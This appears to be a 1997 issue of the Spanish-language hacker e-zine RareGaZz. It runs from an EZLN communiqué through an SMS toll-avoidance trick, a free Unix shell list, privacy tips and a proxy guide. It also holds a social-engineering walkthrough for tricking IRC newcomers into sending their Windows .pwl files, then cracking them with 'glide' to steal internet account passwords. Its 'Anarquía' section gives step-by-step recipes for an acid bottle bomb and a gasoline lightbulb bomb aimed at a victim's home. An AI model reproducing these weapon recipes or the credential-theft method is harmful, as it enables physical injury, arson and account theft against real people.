Sexto. Como parte de su estilo de gobierno y muestra de su "voluntad de paz",
por diversos canales el seor Ernesto Zedillo mando amenazas a la Comandancia
General del EZLN con el siguiente mensaje: "Prefiero pasar a la historia como
represor antes que cumplir los acuerdos con el EZLN".

Esta palabra si la cumplio.

Zedillo ya paso a la historia como asesino de indigenas y lleva en las manos
la sangre de Acteal.

Septimo. La oportuna atencion de los medios de comunicacion a Chiapas y la
justa indignacion de la opinion publica nacional e internacional frente a lo
ocurrido, han provocado que los cerebros del crimen se arrebaten la palabra
para lavarse las manos y para prometer investigaciones "a fondo". No van a
castigar a los responsables, la impunidad esta garantizada porque los que
investigan el crimen son los mismos que lo planearon. Por esta razon, las
declaraciones del seor Zedillo y de sus subalternos no son mas que demagogia.

Octavo. Con motivo de la matanza de Acteal, el gobierno y sus voceros vuelven
a llamar al dialogo sin mencionar su determinacion de no cumplir lo ya
acordado y solo con el proposito de avanzar en su estrategia contrainsurgente.
En este sentido, llama la atencion la reciente y ridicula declaracion de la
Cocopa (que decidio irse de vacaciones en lugar de trabajar por la paz) sobre
los hechos de Acteal. Olvidan los legisladores que el que esta asesinando
nios, mujeres y hombres es el gobierno, olvidan que el que esta haciendo uso
de las armas es el gobierno, olvidan que el que se niega a un dialogo serio es
el gobierno. Es a el al que deben dirigirse cuando hablen de no recurrir a la
violencia y de la necesidad de dialogar.

Noveno. Nuevamente el EZLN llama a la sociedad civil nacional e internacional
y a las organizaciones independientes para que no se dejen engaar, y para que
exijan justicia verdadera y no simulaciones.

Decimo. El Comite Clandestino Revolucionario Indigena Comandancia General del
EZLN se encuentra en estos momentos completando la investigacion y analizando
lo ocurrido para tomar las decisiones necesarias pertinentes.

                                           Democracia!
                                            Libertad!
                                             Justicia!

                               Desde las Montaas del Sureste Mexicano.
                                   Comite Clandestino Revolucionario
                                    Indigena - Comandancia General
                                       del Ejercito Zapatista de
                                         Liberacion Nacional.
                                      Mexico, Diciembre de 1997.





      ۲۲۲۲۲۲۲۲۲۲
                                                           ۲
        Como mandar mensajes gratis desde un movil digital ۲
                                                           ۲
      ۲۲۲۲۲۲۲۲۲۲

                                                 Por DreamWeaver

        Como todos sabeis (o casi todos), los telefonos moviles digitales
 tienen una opcion que consiste en mandar pequeos mensajes escritos, esta
 funcion cuesta en Espaa 25 pts/mensaje.

        El mecanismo de estos mensajes es muy simple, editas un mensaje y
 pones el numero de la persona a la que quieras mandarselo con una pequea
 modificacion ( Si quieres mandar un mensaje al 907 546372, debes poner como
 numero el +34 07 546372 , todo junto por supuesto) el mensaje llega a una
 centralita espaola, te cobra las 25 pts y lo manda al numero que pusiste
 en el mensaje.

 Despues de la explicacion pasemos a lo serio ......

        En otros paises como son Italia o Sudafrica estos mensajes son
 gratuitos... no creis que es una injusticia que nos cobren  a los espaoles
 5 duros por llamada???, pues esa injusticia esta solucionada, y de una forma
 muy simple.. solo teneis que mandar vuestros mensajes a la centralita
 sudafricana, estas centralitas remitiran vuestro mensaje al numero que
 especificasteis igual que la centralita espaola, con una pequea diferencia
 economica, no os cobraran NADA.

 Que?  Ah si, se me olvidaba....
 Pasos a seguir para cambiar de centralita:

 1 Encendeis el movil XD
 2 Entrais en las opciones del movil, seleccionais 'Mensajes', subopcion
    'Estableciendo mensajes' y su subopcion 'Centro de servicio'
 3 Si no os habeis perdido en el paso anterior os aparecera el siguiente
    numero: +3409090909 , borradlo y poner el de la centralita sudafricana.

*NOTA: Estos pasos son en el caso de tener un MoviStar, en el caso del
       Airtel no deben cambiar mucho.

   Conclusiones
        Por supuesto, esto se podra aplicar a otras muchas funciones, dar
 rienda suelta a vuestra imaginacion y si encontrais algo escribidme...

                              Centralita Sudafricana: +27831000002

  DreamWeaver                                       
  e_mail: weaverdream@hotmail.com      





                      =================================
                      |   Free Unix Shell Accounts    |
                      |Lista de servidores que ofrecen|
                      |acceso gratuito a un shell unix|
                      =================================
                                   =VoraX=
       
Hace falta explicar la utilidad de una cuenta shell en un sistem unix?.
Creo que no por eso sin mas palabras mando la lista. No intenten hackear
estos sistemas, para que? si ofrecen un servicio gratis y nos sirven mas
como punto de partida para otros hackeos que para hackearlos.
=Esta lista fue confeccionada originalmente por godson@usa.net existe otra de
exhaust@false.com, pero creo que es copiada de la primera =

= Las listas originales las pueden encontrar buscando en su maquina de
busqueda favorita "Free Unix Shell Accounts" o "Free shell accounts providers
list"

=Para obtener una cuenta generalmente deben enviar un mail, pueden hacerlo
desde la pagina de cada uno donde van a encontrar los datos que deben enviar=
y, se me escaparon algunas palabras :O....

---------------------------------------------------------------------------
ESTOS NO FUNCIONAN MAS:   

flex.laker.net  NO FUNCIONA MAS
Linuxbox        NO HAY MAS CUENTAS GRATIS
Cyber Disaster  NO FUNCIONA MAS
-----------------------------------------------------------------------------

(1)   http://blackbox.thegeek.net/~blackbox/index.html  
(2)   http://www.unixnet.org      "Unixnet.org" 
(3)   http://www.cyberspace.org   "Grex"
(4)   http://sdf.lonestar.org 
(5)   http://continuum.dynip.com 
(6)   http://dishboy.dyn.ml.org  
(7)   http://griffin.ni.net       "Griffin"
(8)   http://suburbia.com.au      "Suburbia"
(9)   http://www.wopr.net         "Wopr Net"
(10)  http://www.nyx.net          "NYX Net"
       (MAS DATOS DE CADA UNO ABAJO)

De estos no tengo datos porque los 
saque de otros lugares:

http://pod.yeat.ml.org
http://free.x-tel.com
http://abyss.suid.net


===(1) [Este lo probe, anda bien]

 Direccion de email:<username>@blackbox.thegeek.net
 Pagina:http://blackbox.thegeek.net/~<username>
 http://blackbox.thegeek.net/~blackbox/index.html 
 Email:  root@blackbox.thegeek.net 
 Fee: -FREE- , donations encouraged 
 Payment Method: cash, check, money order, hardware donation 
 Possibility to order online: email validation 
 Initial HD space: 5MB (mmm.. en realidad son 3MB)
 Additional HD space: Donation 
 Internet Connection: T1 
 Software/service available: ircii, tcl, gcc, ftp, screen, web page, telnet,
                             email account,etc.
 OS: Redhat Linux 4.2 
 Computer: 486/33, 8MB RAM, 600MB HD 
 First appeared: 12-15-1997 

==(2)
 UNIXnet.org http://www.unixnet.org 
 Email: john@piglet.netlite.com (20/12/97)
 Email:  accounts@unixnet.org (2/9/97)
 Fee: -FREE- .. donations requested. 
 Initial HD space: 5Mb (unregulated!)
 Additional HD space: on request, case by case basis 
 Internet Connection: T1, 4 hops to backbone 
 Software/service: ircii, tcl, gcc, ncftp, webpage, email 
 OS: Linux Redhat 4.2 
 Comments: NO bots of any kind unless a donation is made, 
           NO screen. This host is former transient. 
 Last updated 12/20/97. 

===(3)
 Grex http://www.cyberspace.org 
 Email: info-g@cyberspace.org 
 Fee: Voluntary donation 
 Initial HD space: minimal 
 Internet Connection: a tiny 33.6 kbps modem link. 
 Software/service available: PicoSpan and Backtalk, lynx 
 OS: Sun OS 4.1.3 
 Comments: Grex is a public-access conferencing system, run by its users. 
           It's a tiny advertising-free space on the net where you
           can find good conversations and a friendly user community. 
           (SI, todo muy lindo pero es mas lento que la mierda y tenes
           que sacar numero para entrar (literalmente)

===(4)
 http://sdf.lonestar.org 
 Email: accounts@sdf.lonestar.org 
 Initial HD space: 10-20 MB 
 Additional HD space: donation 
 Internet Connection: ISDN, 2 hops 
 Software/service available:  everything you need, bots are welcome 
                              to those who contribute. 
 OS: AT&T 3b2 UNIX System Vr3.2.3 
 Comments: no IRC !
 First appeared: 07-09-1997 
 Last updated: 11-27-1997 

====(5)
 http://continuum.dynip.com 
 Email:  support@continuum.dynip.com 
 Fee: -FREE-, donations encouraged  ($5 to run an eggbot) 
 Payment Method: cash, check, money order 
 Possibility to order online: email validation 
 Initial HD space: 5MB 
 Additional HD space: $1 = +1mb 
 Internet Connection: 512kbps cable modem. 
 Software/service available: ircii, tcl, gcc, ncftp, screen, web page, 
                             email account etc 
 OS: Slackware Linux 3.4 - Kernel 2.0.31 
 Computer: P75, 8MB ram, 1.2GB hd 
 First Appeared: 10-22-1997 
 Last Updated: 11-19-1997 

===(6)
 http://dishboy.dyn.ml.org 
 Email: jonp@radix.net 
 Fee: -FREE- 
 Possibility to order online: mail jonp@radix.net with desired l/p 
 Initial HD space: 5MB soft / 7MB hard limit 
 Additional HD space: Donating members only 
 Internet Connection: 14.4 Modem to radix.nets DS3 PoP in OxonHill,
                      MD, then to digex/cais 
 Software/service available: irc (EPIC4), gcc/cc, perl, ncftp, web page,
                             email account, majordomo (list server), pub ftp 
 OS: Linux Slackware 3.4, kernel release 2.0.32 
 Computer: 486DX4/80MHZ, 16megs RAM, 1.2 gig IDE HD 
 Comments: This system needs donations bad!! 
          Donating members have their Quotas removed and may run more
          intensize processes i.e. bots/ircd's> 
 First appeared: 12-18-1997 

==(7)
 Griffin http://griffin.ni.net 
 Email: egb@griffin.ni.net 
 Fee: None. (Pending individual approval) 
 Possibility to order online: web page signup form. 
 Initial HD space: 5MB 
 Additional HD space: $1 - 1MB 
 Internet Connection:Cablemodem. 750kbps upstream, 10Mbps downstream. 
 Dialup: n/a 
 Software/service available: web, cgi, email, MUD, BitchX, Lynx etc 
 OS: Slackware Linux 2.0.30 ELF 
 Computer: Griffin (main): P60, 1GB HD, 24MB RAM. red5 
                           (monitoring system): P120, 1GB HD, 8MB RAM. 
 Comments: Shell accounts are free, provided I think you're a nice person. 
             Only, dameons such as IRC bots, MUDs and Talkers, and exessive
             disk usage are charged for. 
 Last Updated: 10-06-1997 

==(8)
 Suburbia http://suburbia.com.au 
 Email: info@suburbia.com.au 
 Fee: refer to  http://www.suburbia.com.au/join 
 Payment Method: Visa, Mastercard, Bankcard, cheques, etc 
 Possibility to order online: yes 
 Initial HD space: 5MB 
 Additional HD space: unlimited-ish when a sponsor 
 Internet Connection: BRI (64k), 1 hops to backbone 
 Software/service available: ircII, gcc, ncftp, web page, email account, etc 
 OS: Linux 
 Comments: $10/month, unless you live in Sydney Australia, or good reason 
           given. NO IRCBOTS, NO IRCSERVERS. 
 First appeared: 07-28-1997 
 Last Updated: 12-18-1997 

===(9)
 wopr.net http://www.wopr.net 
 Email: support@wopr.net 
 Fee: -FREE- (donations accepted) 
 Initial HD space: 4MB 
 Additional HD space: NOT AVALABLE 
 Internet Connection: Dual B ISDN (128k) 
 Software/service available: ircii, tcl, gcc, perl, lots more 
 OS: NetBSD 1.2G 
 Computer: Sparcstation 10 with 320m ram 9.2G hd Supersparc Processor 
 First appeared: 12-12-1997 
 Last updated: 12-20-1997 

===(10)
 NYX.net http://www.nyx.net 
 Email(s): aburt@nyx.net 
 Fee: -FREE- 
 Initial HD space: 300Kb 
 Additional HD space: N/A 
 Internet Connection: T1 
 Software/service : web page, email account, tcl 
 OS: SunOS 
 Comments: You need to be validated to use the system. 
           <need comments from nyx users>
 Last Updated: 08-26-1997 

 Envienme comentarios a mi de los servidores que probaron.
 =VoraX= vrx@bigfoot.com




   Como conseguir una cuenta con el glide y un poco de ingenieria social.

   /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
Primero tenemos que localizar algun canal donde regalen cualquier fichero que
les pidamos, esto nomalmente lo encontraremos en canales del tipo :
#beginner
#iniciacion
#novatos
#ayuda_novatos etc..
En mi caso (Espaa) vamos a cualquier servidor del irc como minorisa, ergos,
ctv, arrakis, redestb o cualquier otro, una vez dentro en el caso de cual-
quiera de estos servidores encontraremos el canal #beginer (y algun otro que
indican la inexperiencia de los usuarios que alberga), entonces empezaremos
las relaciones de ingenieria social, algo como lo siguiente:

<Yo> Hola
<Novato> Hola
<Yo> Como va, dominas esto del irc??
<Novato> Si algo, quieres algo?
%%nota: Ahora es el momente para demostrar que somos verdaderamente novatos%%
<Yo> Sabes como pegar un texto el irc en el portapapeles??
<Yo> y si no es pedir mucho....como se escribe una letra en color??
%%%%%%%nota: No nos extrae que el novato no sepa la respuesta a ninguna de
las 2 preguntas :-)%%%%%

<Novato> Con solo seleccional el texto en la pantalla, ya queda automatica-
mente pegado en el portapapeles.
<Novato> Pero la segunda pregunta no tengo ni idea.
<Yo> Sabes enviar ficheros por aqui??
<Novato> Por supuesto
%%Nota: Si no sabe, para nuestro beneficio tendremos que ensearle :-)%%
<Yo> Es que tengo un problema de configuracion con el windows 95
<Yo> y creo que se trata de un fichero que se dao por un virus
<Novato> De que fichero se trata??
<Yo> De alguno *.pwl
<Novato> Espera
<Novato> Si ya lo he encontrado pero tiene mi nombre
<Yo> Si se trata del fichero donde el windows guarda la configuracion perso-
nalizada
<Novato> ah vale
<Yo> me lo puedes pasar?
<Novato> por supuesto

Ya esta!! tenemos el fichero, en ese fichero mucha gente cree que solo hay el
login y el passw de acceso a windows95 pero no es asi, tambien reside la in-
formacion del conocido MiConexion (del win95) con los datos para el acceso a
la cuenta en inet.
Como es normal, solo nos falta una cosa un desencriptador, y existen algunos,
aunque yo personalmente de momento solo he probado el glide, es un 33% eficaz
o sea que desencripta correctamente 1 de cada 3 ficheros, pero creo que vale
la pena.

Copiaremos el fichero *.pwl el el mismo directorio que el glide, entonces pro-
cedemos a la desencriptacion, como podremos comprobar, si escribimos glide,
nos indica que para obtener el correcto funcionamiento del desencriptador te-
nemos que seguir la siguiente estructura:

usage: glide filename (username)

Normalmente, segun mi experiencia, el username no tiene porque corresponder
con el nombre del fichero, ni tan solo lo debemos poner, asi que si el fichero
que nos a pasado el novato se llama barcelona.pwl, bastara con poner:
glide barcelona.pwl
entonces puede que nos encontremos algo del tipo:

Username: barcelona.pwl
Sizemask 1FA5
Analyzing block with size 0000 (0:1)
Analyzing block with size 0000 (1:0)
Analyzing block with size 0034 (2:3)

Esto nos lo encontramos en varias lineas hasta que vemos algo parecido a esto:

Recource [1] (2)
Recource [2] (54)
..............%%Aqui varios lineas parecidas%%
Recource [10] (54)
[Simbolos raros] *Rna\Mi Conexion\juan@server44567 [Simbolos raros]*Rna

Despues sigue alguna linea con recource pero ya esta, ya tenemos lo que anda-
bamos buscando ya podemos conectarnos con la cuenta del novatos poniendo lo
siguiente:

Nombre del usuario:juan@server
Contrasea:44567

Por ultimo, vamos a matizar un par o tres de tonterias (por si lo lee algun
novatillo), la primera y ya se ha dicho es que el glide funciona 1 de cada 3
casos (posiblemente solo funcione con las versiones antiguas del win95) por
ejemplo con el win95 osr2, no funciona.
Una segunda, en el glide aparece el nombre de usuario y contrasea del
"miconexion" del win95, por lo tanto, no le pidais el fichero a un usuario de
linux ;-DD.

La ultima aclaracion igual de tonta se trata de la DNS, en configuracion de
tcp/ip, en la dns que ponemos?? pues bien solo tenemos que ir a algun buscador
como altavista y poner el nombre del servidor en nuestro caso server, os puedo
asegurar que un 99% de veces sale, de forma que si sale un link a www.server
.com, solo tenemos que conectarnos a el y mirar la ip, o mas facil, con algun
portscan que tengamos por ahi.

Eso es todo, ahora se tiene otra conexion para inet, incluso cuando se tenga
varias cuentas, encontraremos algunas charlas donde podremos intercambiarlas.

Este texto ha sido escrito para la revista electronica RareGaZz, como medio
informativo, no me hago responsable del mal uso de dicha informacion, asi como
daos en los sistemas atacados por dicha cuenta ya que el texto ha sido dise-
ado unicamente con fines educativos y para prevenir dichos ataques.

Para cualquier consulta: tatiana76@hotmail.com

                                        -TaTiAnA-
                                      Vilanva City




            ANARQUIA...MAS SOBRE EL ARTE DE HERIR COSAS VIVIENTES

//////////////////////////////////////////////////////////////////////////////

BOMBA DE ACIDO

Materiales:
                -Una botella grande con tapon (si es de cristal ademas
                 se aade metralla cuando explote :-D)
                -Acido Clorhidrico (que se puede encontrar en cualquier
                 drogueria a un precio muy barato; en Espaa tambien se
                 le conoce con el nombre de Salfumant o Agua fuerte)
                -Aluminio; se puede conseguir de las antenas viejas de
                 television (mas efectivo) o del papel ese plateado que
                 sirve para envolver los bocadillos.

Construccion:

Primero hay que averiguar la concentracion de Acido Clorhidrico, normalmente
es del 17%, si es muy alta se debe rebajar un poco con agua porque si no
actuara muy rapido y nos explotara en la cara.

Con el acido se llena un cuarto de la botella y rapidamente se introduce
el aluminio (hay que introducir una buena cantidad si esta en papel, una
buena forma es enrollandolo haciendo tiras y meterlo de golpe). una vez
dentro hay que tapar rapidamente la botella, lanzarla lo mas lejos posible
y a correr!!!

Dependiendo de la concentracion del acido este reaccionara mas pronto o mas
tarde, pero el acido de dentro se volvera negro y empezara a hervir y a
calentarse lanzando gases, si el tapon de la botella ejerce suficiente presion
la botella explotara desparramando el acido hirviendo en un radio de al menos
cinco metros.

No siempre sale una explosion expectacular, primero hay que experimentar
con las dosis de acido y aluminio.

NOTA: el gas que desprende la reaccion ademas de ser SUPER VENENOSO es
inflamable (supongo que es Hidrogeno) por lo que si de alguna manera se
consigue encenderlo la explosion gana mucho.

ATENCION: esta bomba ademas de ser potente puede producir quemaduras muy
graves en la piel y los ojos, asi que si algun incauto me hace caso y lo
prueba debe alejarse bastante del artefacto y en caso de no explotar esperar
un buen rato antes de acercarse.

Mr_Frost

//////////////////////////////////////////////////////////////////////////////

EL FOCO BOMBA

Ingredientes (o material) :
Un foco (de los normales y  que sirva)
Una jeringa (De la que sea)
Azucar (Blanca de preferencia)
Gasolina (De la que sea)
Un traste de plastico o madera o metalico (Para revolver gasolina y azucar)
Una casa (La de la victima)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
             ATENCION  ATENCION  ATENCION  ATENCION  ATENCION  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Nada mas una cosa, quien vaya a hacer esto tiene que star muy seguro de que lo
quiere hacer. Por que quien se va a imaginar que UN FOCO puede VOLAR UNA CASA?
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Instruxiones :
En el trastesillo, revuelves la gasolina con el azucar (Ai + o - [mas o
menos] que quede proporcional la gasolina con el azucar). La metes en la
jeringa. Cojes (el foco) y le haces un oyito con la jeringa en la rosca (si
puedes, si no con otra cosa) pero NO LA CAGUES!! haslo con CUIDADO, de modo
que al ponerlo de vuelta, no se vea el hoyo. Y le hechas la gasolina con
azucar (no me acuerdo que tanto, si alguien le cala poniendo el foco muy muy
lejos como si fuera a poner dinamita, me dice; no?). Y ya que haga todo eso,
naamas se espera a que la victima (lamer) se le ocurra prender la LUZ!!!! y
va a tener MUCHA LUMBRE!!!!
Trucha.

Ai nomas dando lata.  /\/\r Z3/\/4/\/.

//////////////////////////////////////////////////////////////////////////////

 [ Ninguno de estos procedimientos han sido seguidos por ningun miembro de
   RareGaZz. Por favor no hagan estupideces. Avisen si lo hacen :-) ]




                      Existe la Anonimidad en Internet?

 La razon principal de este texto es LLEVARTE AL PANICO TOTAL contandote sobre
 toda la informacion privada que "derrochas" sin darte cuenta. Las lagrimas
 caen de mis ojos cuando veo tantos inocentes y buenos internautas caer en
 las garras de corruptos de todos tipos (como Micro$oft) que esconden
 funciones secretas dentro de sus aplicaciones, o a traves de las maquinas de
 busqueda que usas todo esto para meterte por la garganta un producto o
 servicio cualquiera que eventualmente, terminas usando y muchas veces sin
 necesitarlo. Pero esto termina cuando personas como nosotros nos ponemos
 del lado de los simples e inocentes usuarios (y daamos a los corruptos).

 No anonimidad en la red. Querido internauta, desafortunadamente toda la
 informacion (y la informacion es poder) que estas derrochando por internet
 esta siendo recolectada y usada para obtener un perfil exacto de tu
 persona... esto esta pasando por todo el mundo... Cyber-o-Cracia, como muchos
 lo llaman, se esta acercando... ellos nos rastrean cada vez que usamos
 nuestras tarjetas de credito. Cada vez que compras en el supermercado con
 las llamadas "tarjetas de descuento" (por que crees que nos las entregan
 y nos piden que las usemos?), cada vez que haces una busqueda en el web,
 visitas lugares en internet o simplemente mandas un mail a un grupo de
 noticias o lista de correo.

 Como he dicho, dejas huellas que pueden ser seguidas por cualquier Sherlock
 y conseguir tu nombre... de ahi lo demas.

 Ah! y tu preciosa informacion!
 Los navegadores mas recientes pueden enviar los archivos de tu PC a la red
 sin avisarte, archivos que pueden ser utiles a cualquier persona con la
 intencion de venderte algo.

 AUTOEXEC.BAT Este archivo contiene detalles de muchas cosas importantes
 incluyendo la variable PATH que muestra donde estan tus herramientas.

 SYSTEM.INI Contiene aun mas detalles de los lugares donde tu software esta
 en tu disco, ademas cosas personales como preferencias, etc.

 USER.DAT Este monstruo (que actualmente ocupa mas de 2 megas en mi PC)
 contiene muchisima informacion a cerca de ti. Tu direccion de email, la
 pagina que se ve cuando prendes tu navegador, tu ultima pagina visitada,
 los archivos que bajaste de la red y de que tamao era, etc.

 SYSTEM.DAT En este archivo se encuentran aun mas detalles sobre tu vida
 personal, incluyendo tambien los passwords de los salva pantallas, logins,
 ultimos sitios telnet visitados, en fin, casi cualquier cosa que hayas
 metido a un programa estara ahi. Todos los programas instalados o que alguna
 vez instalaste estan registrados.

 *.PWL Dentro de este archivo estan tus passwords que son facilmente desen-
 criptados (si es necesario) en cualquier computadora.

 nsform??.TMP Toda la informacion que metes en esas formas por internet la
 localizas en estos archivos.

 SECRING.PGP, Secring.SKR, .ASC, etc. Tu llavero donde esta tu llave secreta
 y publica, la primera protegida por tu palabra clave (espero hayas escogido
 una bastante segura:) PERO debes asegurarte que tu maquina no este ejecutando
 ningun grabador de teclas o que algun virus este captando tus claves.

 Como buscar cosas en la red anonimamente.
 Todas las maquinas mantienen un record de tus busquedas y actividades. En
 el web existen algunos lugares donde puedes obtener las cosas mas buscadas
 en el web (la mayoria relacionadas con sexo) e incluso desde algunos sitios
 puedes ver a personas haciendo busquedas en internet (esto es divertido).
 La importancia de las maquinas de busqueda es muchisima (por eso surgen como
 hierba mala) y es necesario saber como protegerte de sus mecanismos de
 rastreo. Debes intentar usar una IP dinamica (asignada cada vez que usas
 internet) y no una permanente. Tu nombre de host (hostname) y I.P. deben ser
 lo mas "neutral" y si es posible, sin ninguna nacionalidad.

 Trucos comunes para capturar personajes anonimos (como nosotros).
 Un truco comun con el que han tratado de capturar nuestras I.P.'s y
 procedencias aqui en RareGaZz es el de la "pagina falsa". Este truco consiste
 en esto principalmente:

 - Agarras un servidor y le instalas todos los scripts PERL conocidos para
 rastrear e incluso applets que te envien toda la informacion del visitante
 a una direccion de email o archivo.

 - Pones cosas en la pagina que el objetivo necesite mucho.

 - Escribe al objetivo promocionando la pagina.

 El objetivo llega a la pagina y PRESTO! lo tienes. Como unicamente el
 sabe la direccion de la pagina, sera el unico visitante esperado.

 Moraleja: MANTEN TODA TU INFORMACION SENSITIVA EN EL WEB! DONDE A NADIE
 SE LE OCURRA ASOMARSE, DIGAMOS QUE TODOS LOS CRACKS QUE HAS HECHO ESTAN
 DENTRO DE UN GIF DE TU PERRO EN UNA PAGINA CON TITULO "BARKIE Y YO". AHI
 ESTARA MUCHO MAS SEGURA TU INFORMACION QUE DENTRO DE TU DISCO DURO.




==============================================================================
                 NAVEGANDO ANONIMAMENTE  - SERVIDORES PROXIES
                              by =VoraX= 30/12/97
==============================================================================
                        I.   Que es un proxy server?
                       II.   Para que sirve un proxy?
                      III.   Como uso un proxy con mi navegador?
                       IV.   Que proxies puedo usar?

(I) Que es un proxy server?

 La traduccion de la palabra "proxy" es "apoderado" o "sustituto", es
 decir una persona que toma la identidad de otra para determinada tarea.
 Aplicado a la computacion y a Internet un proxy es un servidor que sirve
 de intermediario entre un cliente y otro servidor.

 CONEXION NORMAL SIN PROXY   (A <-> B)

                            [RESPUESTA]
            <CLIENTE>       <-------     <SERVIDOR>
         (navegador,ftp)    ========>   (HTTP,FTP,etc)
          (gopher,etc)      [PEDIDO]


 El cliente (A) que puede ser un navegador, un cliente ftp o de cualquier
 otra clase se conecta con el puerto correspondiente del servidor (B).


 CONEXION CON PROXY   (A <-> C <-> B)

                   [RESPUESTA]    =======    [RESPUESTA]
    <CLIENTE>       <------      | PROXY |    <-------     <SERVIDOR>
  (navegador,ftp)   =======>     | SERVER|    =======>    (HTTP,FTP,etc)
   (gopher,etc)     [PEDIDO]      =======     [PEDIDO]

 En este caso el cliente (A) se conecta con un puerto especifico del
 servidor proxy (C), y hace un pedido a otro servidor (B). El proxy C se
 conecta con B y hace el pedido, luego de recibir la respuesta se la envia
 al cliente original A.

 CONEXION CON CACHE PROXY SERVER

                   [RESPUESTA]    =======    [RESPUESTA]
    <CLIENTE>       <------      | PROXY |    <-------     <SERVIDOR>
  (navegador,ftp)   =======>     | SERVER|    =======>    (HTTP,FTP,etc)
   (gopher,etc)     [PEDIDO]      =======     [PEDIDO]
                                    ||
                                    \/
                                 [<CACHE>]
                                 \-------/

 Esta conexion es igual a la anterior con la diferencia de que el
 servidor proxy tiene un cache (en disco) donde almacena las respuestas
 a los pedidos de los clientes (A).

 En una conexion normal cada  programa cliente se comunica con el puerto
 correspondiente en el servidor.Por ejemplo, cuando usamos un navegador,
 este se contacta (generalmente) con el puerto 80 de la otra computadora.
 Cuando bajamos una pagina el pedido se hace a ese puerto, y de alli se
 reciben las respuestas. Cuando usamos el ftp pasa lo mismo pero con un
 puerto distinto (23) aunque en realidad se usan otros para los datos, pero
 no es tema de este texto.
 En cambio, si usamos un proxy el programa cliente se conecta a un puerto
 en una computadora donde funciona el "Proxy Server" y le hace un pedido de
 otro servidor en otro puerto pero de un servicio especifico(http-ftp-etc)
 Por eso existen distintos tipos de proxies de acuerdo al tipo de servicio
 que soportan, lo que mas frecuentemente encontramos es: "HTTP proxy server"
 y "FTP proxy server"

(II) Para que sirve un proxy?

 Los proxies tienen muchas utilidades, generalmente funcionan junto con
 las firewalls, se usan de cache para acelerar la navegacion en LAN's o
 hasta en ISP, pero el uso que nosotros le vamos a dar es el de ANONIMIZADOR
 Como vimos antes, si nos conectamos a un servidor X mediante un proxy,
 nosotros hacemos el pedido al proxy, el proxy lo hace al servidor X y nos
 envia la respuesta a nosotros. Por lo tanto en X queda registrado que se
 conecto el proxy y no directamente nosotros. Aunque en  los logs del proxy
 puede figurar nuestra IP y a donde nos conectamos. En definitiva usando
 proxies ocultamos nuestra IP, y por lo tanto nos ANONIMIZAMOS.

(III) Como uso un proxy con mi navegador?

 Lo que necesitamos para usar un proxy en un programa cliente es configurar
 su direccion (IP o nombre) y el puerto en el que funciona. Debemos conocer
 que tipo de servicios soporta el proxy, de acuerdo a esto cambia el puerto
 en el que funciona, aunque hay muchas excepciones.
 En algunos programas tenemos casillas para completar la direccion y el
 puerto de un proxy para cada servicio en otros debemos poner la URL
 de la forma http://DOMINIO:PUERTO ej: http://Proxy.wasantara.net.id:8080
 Los tipos de proxy que soportan muchos navegadores son:HTTP,FTP,GOPHER,
 WAIS, Security y SOCKS. Los cuatro primeros creo que los conocen porque
 hasta en el texto mas chico y estupido sobre internet los describe. El
 Security es para manejar el SSL.SOCKS se usa en las firewalls para
 controlar el acceso a servicios en Internet, sirve de filtro de las
 conexiones, permite loguear tan especificamente, permitir o no el acceso
 a determinados sistemas y muchas otras funciones.

 COMO CONFIGURAR LOS PROXIES EN LOS NAVEGADORES MAS CONOCIDOS:

   =Netscape 1.22 (e inferiores)=
   Menu Options->Prefereces->Proxy
   (Resetear?)

   =Netscape 2.0 (y superiores)=
   Menu Options->Network Preferences->Proxy

   =Netscape 4.x =
   Menu Edit->Preferences...->Doble clik en Advanced->Clik en Proxies->
   (en la derecha) marcar Manual Proxy Configuration -> Click en boton View

   =Internet Explorer 2.0 for windows =
   Clikea con el boton derecho sobre el icono->selecciona Properties->Advanced
   ->Use proxy server-> http://algun_proxy.com:8080

   =Internet Explorer 3.0 for windows =
   1)Menu View->Options->Connection->
   2)Marcar Connect through a proxyserver
   3) clikea en Settings y pone http://algun_proxy.com:8080

   =Internet Explorer for Mac OS=
   Menu  Edit->Options->Proxy->http://algun_proxy.com:8080

   =NCSA Mosaic for Unix 2.4 (o superior)=
   Se deve setear la variable de entorno http_proxy a http://algun_proxy.com:
   esto depende del shell:
   csh -> setenv http_proxy http://algun_proxy.com:8080
   bash-> export http_proxy='http://algun_proxy.com:8080'

   =NCSA Mosaic for Macintosh 2.0 (o superior)=
   Menu Options->Preferences->Use Cern proxy service->Gates
   Setear el HTTP gate a  algun_proxy.com y en el segundo casillero el port

   =Enchanced Mosaic for Macintosh=
   Menu Edit->Prefereces->Proxy server poner http://algun_proxy.com:8080

   =Lynx for Unix 2.3 o superior =
   Igual que el NCSA MOSAIC hay que setear la variable de entorno.(ver arriba)

   Para configurar en otros programas buscar en la ayuda y en los menues
   o se pone la URL o la direccion y el puerto.

(IV) Que proxies puedo usar?

 Hace un tiempo se hizo famoso el www.anonymizer.com, este brinda
 el servicio de anonimizacion, claro se hizo pago y tenemos un retardo de
 unos segundos cada vez que lo usamos si no abonamos.
 Pero existen muchos otros proxies en el mundo que nos pueden servir,
 algunos son reservados para determinados usuarios, otros filtran, algunos
 dicen que borran sus logs semanalmente, otros que se los dan a la justicia
 si se los piden, unos son mas rapidos otros son lentos. Por eso es cuestion
 de buscar y encontrar uno que nos brinde seguridad y velocidad
 (servicio y limpieza?:) , FTP y HTTP como minimo.
 Si encuentran un proxy fijense de que tipo es, generalmente se ven cosas
 com FTP:1030 SOCK:8010  HTTP:8080 esto indica en que puerto soporta cada
 servicio.

 ALGUNOS PROXIES EN EL MUNDO:
(AUSTRALIA-ALEMANIA-BELGICA-USA-INDONESIA-ISRAEL-ITALIA-GRECIA-ESPAA-HOLANDA)
 web.mit.edu:80    (funciona siempre pero es 'conocido')
 win.tue.nl:8080   (dejo de funcionar)
 proxy.magusnet.com:8080   (no funciona-probar)
 proxy.voz.cz:8080         (probar)
 proxy.di.uoa.gr:8080
 proxy.aljan.com.au:8080 socks:8010 (restringido?)
 white.aljan.com.au:8080 socks:8010 (restringido?)
 wwwproxy.weizmann.ac.il:8080
 Proxy.wasantara.net.id:8080 o 3128 202.159.81.75  (funciona bien)
 proxy.netura.net.id:8081
 proxy.belnet.be:8000
 proxy.tarheel.net:8080
 [ de los siguientes no se nada, averiguen los puertos y demas datos]
